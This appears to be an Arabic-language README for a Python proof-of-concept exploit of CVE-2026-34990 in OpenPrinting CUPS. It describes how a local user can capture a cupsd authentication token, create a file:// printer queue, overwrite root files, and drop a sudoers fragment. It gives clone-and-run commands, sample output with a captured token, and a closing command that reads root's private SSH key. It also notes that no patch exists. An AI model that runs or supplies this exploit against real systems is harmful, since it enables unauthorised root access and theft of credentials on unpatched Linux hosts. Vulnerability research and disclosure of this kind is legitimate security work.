
إثبات مفهوم بلغة Python للثغرة CVE-2026-34990 في OpenPrinting CUPS، يجبر cupsd على تسريب رمز مصادقة محلي والكتابة فوق ملفات root عبر قائمة انتظار طابعة file://.
CVE-2026-34990 - في إصدارات OpenPrinting CUPS 2.4.16 وما قبلها، يمكن لمستخدم محلي غير متميز إجبار cupsd على المصادقة مع خدمة IPP محلية يتحكم بها المهاجم باستخدام رمز Authorization: Local ... قابل لإعادة الاستخدام. هذا الرمز كافٍ لتنفيذ طلبات /admin/ على المضيف المحلي، ويمكن للمهاجم دمج CUPS-Create-Local-Printer مع printer-is-shared=true لإنشاء قائمة انتظار file:///... بشكل دائم حتى على الرغم من أن سياسة FileDevice العادية ترفض مثل هذه المعرّفات (URIs). الطباعة إلى قائمة الانتظار تلك تمنح الكتابة التعسفية على ملفات الجذر (root)؛ ويستخدم PoC أدناه هذه البدائية لإسقاط جزء من sudoers وإثبات تنفيذ أوامر الجذر. في وقت النشر، لا توجد تصحيحات متاحة للعموم.
git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990
python3 CVE-2026-34990.py
python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...
ثم:
sudo -n cat /root/.ssh/id_rsa